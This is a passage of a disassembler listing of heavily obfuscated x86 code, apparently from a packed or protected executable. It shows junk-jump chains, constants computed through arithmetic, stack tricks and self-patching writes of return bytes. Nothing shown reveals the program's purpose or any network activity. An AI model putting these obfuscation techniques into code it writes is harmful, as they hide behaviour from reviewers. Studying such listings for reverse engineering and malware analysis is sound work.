; FUNCTION CHUNK AT 004560FC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457149 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457855 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C75 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004599BA SIZE 00000004 BYTES

		xchg	esi, [esp+0]
		pop	esi
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_458C75
		jmp	loc_44F76D
sub_44C4BC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F567

loc_44C4CF:				; CODE XREF: sub_43F567+Bj
		jg	loc_457C33
		jmp	loc_45C56E
; END OF FUNCTION CHUNK	FOR sub_43F567
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44C4DB:				; CODE XREF: sub_445787+6508j
		jmp	loc_43E545
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_44C4E0:				; CODE XREF: y2kk37jd:loc_442AFDj
		cmp	byte ptr [eax],	0
		jnz	loc_43C0D4
		jmp	loc_4421B8
; ---------------------------------------------------------------------------
		mov	eax, [ebp+0]
		cmp	ecx, edi
		jmp	loc_43D588
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_44C4F8:				; CODE XREF: sub_448770+6B86j
		pop	ebx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_448770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B47E

loc_44C4FB:				; CODE XREF: sub_44B47E+23F0j
		jmp	nullsub_195
; END OF FUNCTION CHUNK	FOR sub_44B47E

; =============== S U B	R O U T	I N E =======================================



sub_44C500	proc near		; CODE XREF: sub_440AA5p
					; sub_440AA5+BBC8p ...
		call	sub_44700D

loc_44C505:				; CODE XREF: sub_458975+9j
		jmp	sub_452441
sub_44C500	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_44C50A:				; CODE XREF: sub_441F30+CBB9j
		jmp	loc_44C353
; END OF FUNCTION CHUNK	FOR sub_441F30
; ---------------------------------------------------------------------------

loc_44C50F:				; CODE XREF: y2kk37jd:0045A41Fj
		add	edx, 0CC39A70Ch
		xor	edx, 7733C503h
		push	ecx
		push	0FDA65E9Dh
		pop	ecx
		jmp	loc_43CE8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_44C527:				; CODE XREF: sub_44DBF8+A1A9j
		push	4B1C86h
		mov	eax, [ebp-10h]
		push	eax
		push	eax
		push	0EFC6F736h
		pop	eax
		and	eax, 9E2852D8h
		jmp	loc_451DA6
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44C542:				; CODE XREF: sub_4448E2:loc_45C66Aj
		xor	eax, esi
		pop	esi
		ror	eax, 14h
		jns	loc_43C420
		push	ecx
		push	79C41477h
		pop	ecx
		and	ecx, 80E60DC7h
		jmp	loc_447732
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_44C560:				; CODE XREF: sub_4466E0:loc_44F04Fj
		or	eax, eax
		jnz	loc_4462F4
		jmp	loc_458B44
; END OF FUNCTION CHUNK	FOR sub_4466E0

; =============== S U B	R O U T	I N E =======================================



sub_44C56D	proc near		; CODE XREF: y2kk37jd:00458E66j
					; sub_458520:loc_45B1C3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00449689 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044CAAA SIZE 00000015 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [esp-4+arg_0]
		push	ebx
		jmp	loc_44CAAA
sub_44C56D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C57A	proc near		; CODE XREF: y2kk37jd:004471EAj
					; y2kk37jd:00456C10p
		xchg	esi, [esp+0]
		pop	esi

loc_44C57E:				; CODE XREF: y2kk37jd:loc_44E0CDj
		pop	eax
		jmp	sub_44E5E5
sub_44C57A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, edx
		jmp	loc_45B4F4
; ---------------------------------------------------------------------------

loc_44C58F:				; CODE XREF: y2kk37jd:00451366j
		add	esi, ebx
		and	edx, 6FFD9D14h
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_44C597:				; CODE XREF: sub_4447EA:loc_451342j
		xor	ecx, 0C2D022C6h
		call	sub_45095F
; END OF FUNCTION CHUNK	FOR sub_4447EA
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44C5A2:				; CODE XREF: sub_44FB21+Bj
		jmp	sub_448D42
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------

loc_44C5A7:				; CODE XREF: y2kk37jd:0045B470j
		or	eax, ecx
; START	OF FUNCTION CHUNK FOR sub_447423

loc_44C5A9:				; CODE XREF: sub_447423:loc_45B464j
		add	eax, 0ECFC73C8h
		popf
		xchg	eax, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_447423

; =============== S U B	R O U T	I N E =======================================



sub_44C5B8	proc near		; CODE XREF: y2kk37jd:0043EE15j
					; y2kk37jd:00444CF7p
		xchg	esi, [esp+0]
		pop	esi
		call	nullsub_76
		jmp	ds:dword_41E144
sub_44C5B8	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS	KEYPAD "+" TO EXPAND]
		dd 911180h, 3C0EE900h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_244. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_44C5D3:				; CODE XREF: sub_443BAF+14466j
		jmp	loc_4462A0
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EDE

loc_44C5D8:				; CODE XREF: sub_444EDE:loc_44BFCAj
		mov	edx, [ebp+8]
		imul	dword ptr [edx-4]
		push	offset sub_441222
; END OF FUNCTION CHUNK	FOR sub_444EDE
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44C5E3:				; CODE XREF: sub_43EF4F:loc_44BBAAj
		jmp	loc_43D9D5
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_412. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44C5E9	proc near		; CODE XREF: sub_43BA66:loc_4585DEp
					; sub_45BE0D+4p

; FUNCTION CHUNK AT 00454225 SIZE 00000008 BYTES

		mov	eax, cs
		xor	al, al
		or	eax, eax
		call	sub_43C0B8

loc_44C5F4:				; CODE XREF: sub_4538AC+Dj
		jmp	loc_454225
sub_44C5E9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44C5F9:				; CODE XREF: sub_43ED86:loc_4488A7j
		jmp	nullsub_178
; END OF FUNCTION CHUNK	FOR sub_43ED86

; =============== S U B	R O U T	I N E =======================================



sub_44C5FE	proc near		; CODE XREF: sub_452995+2126j

var_4		= dword	ptr -4

		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp+4+var_4]
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		retn
sub_44C5FE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C60A:				; CODE XREF: y2kk37jd:004549AEj
		jmp	loc_454DBC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44C60F:				; CODE XREF: sub_445787:loc_450088j
		sub	edi, 3A150204h
		or	edi, 0E9F5E5DDh
		add	edi, 144DB8F3h
		xchg	edi, [esp+0]
		jmp	sub_447977
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		pop	eax
		push	offset loc_4402FB
		jmp	loc_44D035
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_417. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_44C63B:				; CODE XREF: sub_4438B1:loc_44554Cj
		mov	eax, ds:dword_442820
		or	eax, eax
		jnz	loc_43F36E
		jmp	loc_453D34
; END OF FUNCTION CHUNK	FOR sub_4438B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44C64F:				; CODE XREF: sub_43F75D+1A258j
		jmp	loc_44F3DC
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F0F

loc_44C654:				; CODE XREF: sub_456F0F-17570j
		jmp	loc_457B27
; END OF FUNCTION CHUNK	FOR sub_456F0F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_413. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_44C65A:				; CODE XREF: y2kk37jd:00451DD2j
					; sub_456D3F+48C1j
		jmp	loc_45A324
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
		sbb	ebx, esi
		jmp	loc_43C493
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E03C

loc_44C667:				; CODE XREF: sub_43E03C+8j
		jmp	loc_44F09B
; END OF FUNCTION CHUNK	FOR sub_43E03C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_44C66C:				; CODE XREF: sub_440AA5:loc_457D48j
		push	edx
		call	sub_44C500
		mov	eax, 64A3F24h
		push	edx
		push	6E37AAB0h
		pop	edx
		sub	edx, 0F753354Fh
		xor	edx, 0DCB7B97Fh
		jmp	loc_43EF23
; END OF FUNCTION CHUNK	FOR sub_440AA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_44C68F:				; CODE XREF: sub_453849:loc_450AB6j
		pop	edx
		rol	edx, 7
		sub	edx, 37518A50h
		xor	edx, 0CB71D10Ch
		rol	edx, 4
		add	edx, 9F3823C1h
		xchg	edx, [esp+4+var_4]
		jmp	loc_45939D
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------

loc_44C6B0:				; CODE XREF: y2kk37jd:00459934j
		jp	loc_45833F
		cmp	ecx, eax
		jmp	loc_43EECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44C6BD:				; CODE XREF: sub_4480CB:loc_44FC48j
		add	edx, 14h
		mov	ecx, [ebx+edx-8]
		or	ecx, ecx

loc_44C6C6:				; CODE XREF: y2kk37jd:loc_455DF4j
		jz	loc_444FA4
		call	sub_43CB82
		jnz	loc_451AA2
		jmp	loc_440647
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_44C6DC:				; CODE XREF: sub_44A33C-ECC7j
		sub	eax, 4152C517h
		rol	eax, 1
		jmp	loc_44D152
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_44C6E9:				; CODE XREF: sub_4552EBj
		mov	eax, ds:dword_43BEC8
		call	sub_43D41D

loc_44C6F4:				; CODE XREF: y2kk37jd:00456D95j
		jmp	loc_449251
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------

loc_44C6F9:				; CODE XREF: y2kk37jd:0044E69Ej
		jmp	loc_43E1FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44C6FE:				; CODE XREF: sub_44CDD5-63FCj
		jmp	loc_45AF25
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C704:				; CODE XREF: y2kk37jd:00442436j
		jmp	loc_45C0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_44C709:				; CODE XREF: sub_44F641-F6F7j
		jmp	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425EC

loc_44C70E:				; CODE XREF: sub_4425EC:loc_43B8F4j
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_4425EC
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44C70F:				; CODE XREF: sub_43F75D:loc_43B583j
		or	edx, 0DDE260AEh
		rol	edx, 14h
		add	edx, 5153E172h
		mov	[edx], eax
		jmp	loc_45BD9D
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		jmp	loc_45C5AC
; ---------------------------------------------------------------------------
		jmp	loc_454AE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44C72F:				; CODE XREF: sub_4507BF:loc_442745j
					; sub_448DCA-24A4j ...
		jns	loc_44E06B
		cmp	dword ptr [ebp-10Ch], 76676264h
		jnz	loc_447BCD
		jmp	loc_4542F8
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44C74A:				; CODE XREF: sub_44107E+12733j
		pop	edi

loc_44C74B:				; CODE XREF: y2kk37jd:0044213Fj
		rol	eax, 19h
		add	eax, 0C4272B64h
		xchg	eax, [esp-8+arg_4]
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_44C75C:				; CODE XREF: y2kk37jd:0043FA2Cj
		call	sub_4476EE
		or	eax, eax
		jnz	loc_45AD2C
		jmp	loc_4596B3
; ---------------------------------------------------------------------------
		push	edx
		push	29C8C2A2h
		pop	edx
		and	edx, 0FD7A1722h
		jmp	loc_44961F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_44C780:				; CODE XREF: sub_44CF09:loc_441B2Dj
		add	eax, 0C90723E1h
		add	eax, ebp
		add	eax, 3780DC6Ch
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_455BDC
		jmp	loc_43C826
; END OF FUNCTION CHUNK	FOR sub_44CF09

; =============== S U B	R O U T	I N E =======================================



sub_44C79E	proc near		; CODE XREF: y2kk37jd:00448377j
					; y2kk37jd:loc_456E08p

; FUNCTION CHUNK AT 0043C994 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446798 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004557E9 SIZE 0000001D BYTES

		xchg	edi, [esp+0]
		pop	edi
		cmp	edx, 0D91D7183h
		xor	eax, ecx
		push	edx
		push	75B8BCEh
		jmp	loc_43C994
sub_44C79E	endp

; ---------------------------------------------------------------------------
		sbb	edi, 4761C95Bh
		push	8EED657Ch
		jmp	sub_45380A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44C7C6:				; CODE XREF: sub_43F911-3BE9j
		jmp	loc_44F03E
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44C7CB:				; CODE XREF: sub_43F8B8+D5B4j
		add	esi, 62065A3Eh
		rol	esi, 7
		or	esi, 2EFB5EE1h
		test	esi, 200000h
		jmp	loc_452246
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_44C7E5:				; CODE XREF: sub_451C7D+42Cj
		xor	edx, 2E049368h
		and	edi, 97A5BF79h

loc_44C7F1:				; CODE XREF: sub_453F01+Ej
		xor	esi, 94DF8BF6h
		or	esi, ebx

loc_44C7F9:				; CODE XREF: sub_451C7D:loc_45A3B5j
		mov	eax, [ebp-4]
		jmp	loc_43C2BA
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C4E

loc_44C801:				; CODE XREF: sub_446C4E:loc_448D9Cj
		or	edi, 298E9Ah
		rol	edi, 17h
		add	edi, 3248C507h
		xchg	edi, [esp+4+var_4]
		jmp	loc_448C1B
; END OF FUNCTION CHUNK	FOR sub_446C4E
; ---------------------------------------------------------------------------

loc_44C818:				; CODE XREF: y2kk37jd:00441EA9j
		test	edx, 0DA344C06h
		jmp	loc_448539
; ---------------------------------------------------------------------------
		push	edx
		push	81A787B2h
		pop	edx
		sub	edx, 293BCF50h
		add	edx, 0A8972480h
		jmp	loc_4431BE
; ---------------------------------------------------------------------------

loc_44C83B:				; DATA XREF: sub_457D5A:loc_4451A6o
		push	0DB0EACEh
		pop	eax
		rol	eax, 15h
		add	eax, 217DAC99h
		add	eax, ebp
		jmp	loc_43DD8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44C851:				; CODE XREF: sub_448700:loc_43B019j
		jnb	loc_443B71
		jmp	loc_44EAC9
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		cmp	ebx, 7CA9EFE7h
		jmp	loc_4570E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_44C867:				; CODE XREF: sub_458A74:loc_447D1Fj
		add	eax, 0FDB29F2Ch
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43CBB1
		jmp	loc_43B889
; END OF FUNCTION CHUNK	FOR sub_458A74

; =============== S U B	R O U T	I N E =======================================



sub_44C87D	proc near		; DATA XREF: y2kk37jd:0045125Bo
		mov	[esi], eax
		pop	esi
		lea	eax, loc_446C6B
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AC52
sub_44C87D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C88E	proc near		; CODE XREF: sub_410A9C+9Bp
					; y2kk37jd:0043FE40j
					; DATA XREF: ...
		push	esi
		jmp	loc_44F403
sub_44C88E	endp


; =============== S U B	R O U T	I N E =======================================



sub_44C894	proc near		; DATA XREF: sub_445FFF+354Ao

; FUNCTION CHUNK AT 004416CC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004426A4 SIZE 00000005 BYTES

		push	edx
		push	9FAF9B2Bh
		pop	edx
		add	edx, 0DD7DD472h
		sub	edx, 26BF6FD6h
		rol	edx, 9
		add	edx, 24425170h
		jmp	loc_4426A4
sub_44C894	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C8B5	proc near		; DATA XREF: y2kk37jd:loc_458303o
		mov	eax, [ebp-8]
		push	offset sub_44CABF

loc_44C8BD:				; CODE XREF: y2kk37jd:0044F9DBj
		jmp	loc_44D15D
sub_44C8B5	endp

; ---------------------------------------------------------------------------
		test	ecx, 0C021E062h
		jmp	loc_44DE46
; ---------------------------------------------------------------------------

loc_44C8CD:				; DATA XREF: sub_44C304:loc_43CD36o
		xor	edx, 978B9B48h
		call	sub_440CD1
		push	eax
		push	offset sub_43D779
		jmp	locret_44DA33
; ---------------------------------------------------------------------------
		db 87h
		dd 525E2434h, 652DC168h, 0F2815AE1h, 6263749Ah,	0FF6883E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_44C8F9:				; CODE XREF: sub_44CF38+134Bj
					; sub_44CF38:loc_44F033j
		mov	eax, offset off_44BDA8
		mov	[ebp-4], eax
		push	25AA3602h
		pop	eax
		jmp	loc_45A2D3
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------

loc_44C90C:				; CODE XREF: y2kk37jd:loc_455EC3j
		jnz	loc_44A968
		jmp	loc_43EC52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_44C917:				; CODE XREF: sub_43B765+B942j
		sbb	edx, ebp
		popf
		xchg	edx, [edi]
		pushf
		jmp	loc_43C58F
; END OF FUNCTION CHUNK	FOR sub_43B765

; =============== S U B	R O U T	I N E =======================================



sub_44C922	proc near		; CODE XREF: y2kk37jd:00440957j
					; sub_44E648+AD20p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443230 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459B7F SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	edi, [esp-4+arg_0]
		push	edi
		push	0AFFCE3ADh
		pop	edi
		sub	edi, 5B8543Bh
		add	edi, 560063EBh
		jmp	loc_459B7F
sub_44C922	endp

; ---------------------------------------------------------------------------

locret_44C941:				; CODE XREF: y2kk37jd:loc_44D2ADj
		retn
; ---------------------------------------------------------------------------

loc_44C942:				; CODE XREF: y2kk37jd:0044F1B4j
		jnz	loc_44C0B1
		test	edx, 0E84D119Fh
		jmp	loc_44B85E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_44C953:				; CODE XREF: sub_43E0DE+Aj
		add	eax, ebp
		push	ebx
		push	0CDF8A70Fh
		pop	ebx
		add	ebx, 6980713h
		jmp	loc_4559C5
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44C967:				; CODE XREF: sub_445568:loc_4464AEj
		pop	ecx
		pop	ebp
		retn	4
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44C96C:				; CODE XREF: sub_445226+49Cj
					; y2kk37jd:loc_44CA21j
		jmp	loc_44C155
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44C971:				; CODE XREF: sub_4577FE-19B1Aj
					; sub_4577FE-14A9Aj ...
		mov	edx, [esp-4+arg_0]
		mov	al, 1
		call	edx
		jmp	loc_44CA87
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------

loc_44C97D:				; CODE XREF: y2kk37jd:0043EB31j
		jnz	loc_448058
		jmp	loc_44BA6E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C989:				; CODE XREF: y2kk37jd:0045A816j
		jmp	loc_44A432
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AAA

loc_44C98E:				; CODE XREF: sub_448AAA+A2D0j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_448AAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44C993:				; CODE XREF: sub_4411C3:loc_45420Bj
		and	edx, 0FB63FBD8h
		sub	edx, ds:4000F3h
		add	edx, 3DD522A1h
		xchg	edx, [esp+0]
		jmp	loc_44F91B
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_44C9AD:				; CODE XREF: sub_4518C3:loc_44E8A6j
		push	ecx
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		mov	eax, ds:dword_444AF4
		jmp	loc_44CA41
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44C9C1:				; CODE XREF: sub_4458DD:loc_4532A7j
		pushf
		push	8A19FDA7h
		pop	edx
		add	edx, 1607CDC1h
		jmp	loc_442EC7
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44C9D3:				; CODE XREF: sub_44FB21-4745j
		mov	[esi], eax
		pop	esi
		lea	eax, sub_44FB21
		mov	byte ptr [eax],	0C3h
		jmp	sub_44FB21
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------

loc_44C9E4:				; CODE XREF: y2kk37jd:0045B1EEj
		jl	loc_441788
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44C9EA:				; CODE XREF: sub_4507BF+1Cj
		jmp	loc_442F1F
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		pushf
		test	ecx, 9BA2CF4Eh

loc_44C9F6:				; CODE XREF: y2kk37jd:004541BFj
		jmp	loc_441782
; ---------------------------------------------------------------------------

loc_44C9FB:				; DATA XREF: y2kk37jd:00440B06o
		mov	edx, eax
		push	ecx
		push	548A35A0h
		pop	ecx
		and	ecx, 0C7F731A0h
		add	ecx, 0BCC0BF00h
		sub	ecx, 13B0A3D9h
		add	ecx, 12B1B76Bh
		jmp	loc_450195
; ---------------------------------------------------------------------------

loc_44CA21:				; CODE XREF: y2kk37jd:0044DA97j
		jp	loc_44C96C
		xor	edx, edi
		xchg	ebx, [esi]
		jmp	loc_4551A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44CA30:				; CODE XREF: sub_442A84+Bj
		jnz	loc_44E4F5
		jmp	loc_44079E
; END OF FUNCTION CHUNK	FOR sub_442A84
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_303. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44CA3C:				; CODE XREF: sub_448700+463Dj
		jmp	loc_43F616
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_44CA41:				; CODE XREF: sub_4518C3-4F07j
		or	eax, eax
		jnz	loc_45101D
		jmp	loc_4528A7
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------

loc_44CA4E:				; CODE XREF: y2kk37jd:00444F99j
		jge	sub_43BDF4
		or	ebp, 46C88302h
		test	eax, 0A07F16C9h
		jmp	loc_455DF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B84

loc_44CA65:				; CODE XREF: sub_454B84+9j
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp-8+arg_4]
		push	edx
		push	ebx
		jmp	loc_45679B
; END OF FUNCTION CHUNK	FOR sub_454B84
; ---------------------------------------------------------------------------

locret_44CA72:				; CODE XREF: y2kk37jd:loc_43B5C6j
		retn
; ---------------------------------------------------------------------------
		neg	eax
		sbb	eax, eax
		neg	eax
		mov	[ebp-5], al
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_44CA7C:				; CODE XREF: sub_454E20:loc_4488B8j
		js	loc_441D0A
		jmp	loc_45C456
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44CA87:				; CODE XREF: sub_4577FE-AE86j
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7F3

loc_44CA8A:				; CODE XREF: sub_43B7F3+13j
		jmp	loc_453D72
; END OF FUNCTION CHUNK	FOR sub_43B7F3

; =============== S U B	R O U T	I N E =======================================



sub_44CA8F	proc near		; CODE XREF: sub_459158-1A5F6p
					; sub_454413+51ECp

; FUNCTION CHUNK AT 004576BB SIZE 00000019 BYTES

		push	esi
		push	0FC95605Bh
		pop	esi
		rol	esi, 15h
		jmp	loc_4576BB
sub_44CA8F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44CA9E:				; CODE XREF: sub_445226+1A6j
		not	esi
		push	0C08A783Fh
		jmp	loc_44BFCF
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C56D

loc_44CAAA:				; CODE XREF: sub_44C56D+8j
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_45ADEC
		push	536F3E34h
		pop	eax
		jmp	loc_449689
; END OF FUNCTION CHUNK	FOR sub_44C56D

; =============== S U B	R O U T	I N E =======================================



sub_44CABF	proc near		; DATA XREF: sub_44C8B5+3o

; FUNCTION CHUNK AT 0044C188 SIZE 00000005 BYTES

		push	eax
		call	sub_44DB32

loc_44CAC5:				; CODE XREF: y2kk37jd:0043EC28j
		mov	eax, 0B2h
		call	sub_454413
		jmp	loc_44C188
sub_44CABF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_44CAD4:				; CODE XREF: sub_44753E-7159j
		jmp	loc_453DC9
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_44CAD9:				; CODE XREF: sub_440337j
		mov	edx, ds:dword_441110
		or	edx, edx
